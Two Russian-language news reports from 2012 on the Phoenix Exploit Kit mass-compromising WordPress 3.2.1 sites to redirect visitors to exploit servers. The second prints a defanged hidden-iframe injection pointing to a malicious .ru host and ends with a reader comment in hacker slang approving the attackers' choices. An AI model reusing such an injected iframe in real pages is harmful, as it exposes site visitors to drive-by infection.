ИТ-компания M86 Labs предупредила пользователей и веб-издателей об обнаружении новой атаки, направленной на блоги, функционирующие на базе платформы Wordpress. Согласно сообщению компании, новый набор эксплоитов, известный как Phoenix, получил ряд возможностей, направленных на эксплуатацию уязвимости, выявленной в блог-платформе Wordpress 3.2.1. M86 Labs отмечает, что сейчас в результате работы этого эксплоита были поражены несколько сотен сайтов, а сам опасный код в руках злоумышленников находится уже несколько дней. Набор эксплоитов Phoenix изначально был создан для автоматизированного заражения целевых систем. Он позволяет распространителям вредоносных кодов автоматически внедрять их коды на пораженные сайты. В случае посещения пользователем зараженного сайта, размещенный на нем код пытается выполнить ряд действий, опробовав различные методы атак против современных браузеров и популярных инструментов, таких как Java, размещая троянское ПО, даунлоадеры, клавиатурные шпионы и др. Новая атака на Wordpress создана с тем, чтобы у атакующих была возможность быстро скомпрометировать сайты, находящиеся в белых списках URL-фильтров и провести атаку незаметно для систем предупреждения браузеров. Также на всех взломанных Wordpress-сайтах размещается дополнительная страница, перенаправляющая пользователя на внешний сайт, где также совершается атака. "Посещение любой из страниц на зараженном сайте переадресует пользователя на вредоносный сервер, но не инфицирует пользовательский компьютер напрямую", - говорит компания в своем отчете. "Главная мотивация атакующих - обойти репутационные URL-фильтры браузеров, спам-фильтры и другие меры безопаcности, чтобы вручить пользователю вредоносный код". (04:25) 31.01.2012 http://cybersecurity.ru/crypto/142992.html
Phoenix Exploit Kit распознаёт и не трогает браузеры Google Chrome Специалисты по безопасности из M86 Security Labs обнаружили массовое заражение сотен сайтов на движке WordPress 3.2.1. Используя известную уязвимость устаревшей версии WordPress и уже опубликованные эксплоиты для него (1, 2), злоумышленники внедряют жертве в папку Uploads файл HTML с редиректом на страницу с набором эксплоитов Phoenix Exploit Kit. Уже обнаружено как минимум 400 заражённых сайтов: выборка 1, выборка 2. Самим этим сайтам беспокоиться не о чём, они могут даже не заметить заражения. Злоумышленники используют их просто в качестве красивых URL, чтобы ссылка вызывала доверие у жертв (и чтобы проще обойти спам-фильтры), и рассылают спам, содержащий ссылку на вышеупомянутую страницу. Вот фрагмент обфусцированного этой страницы. Этот обфусцированный код ведёт на серверы из инфраструктуры Phoenix Exploit Kit. Проведя расшифровку вышеуказанного кода, можно расшифровать конкретные URL, куда происходит редирект. Например, horoshovsebudet.ru. Code: IFRAME style=”RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px” src=”hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php” frameborder=”0″ Другой URL из той же инфраструктуры — hxxxp://monikabestolucci.ru:8801/html/yveveqduclirb1.php. При этом злоумышленники используют технику Fast Flux для динамического изменения соответствия между IP-адресом и доменным именем, так что данному домену соответствуют десятки IP-адресов. На сайте Phoenix Exploit Kit происходит распознавание юзер-агента жертвы и на него сваливается ряд экслоитов, характерных для его версии ОС и браузера. Например, при распознавании IE6 пользователь получает эксплоиты для Internet Explorer, Adobe PDF, Flash и Oracle Java. Статистика эксплоитов с контрольной панели Phoenix Exploit Kit Судя по следующему скриншоту исходного кода Phoenix Exploit Kit по какой-то причине игнорирует пользователей браузера Google Chrome. Дата: 31.01.2012 http://www.xakep.ru/post/58210/
и правильно. у хрома пробив копеешный. только статистику портить и лишнее палево. а у блекхоул встроеная тдс)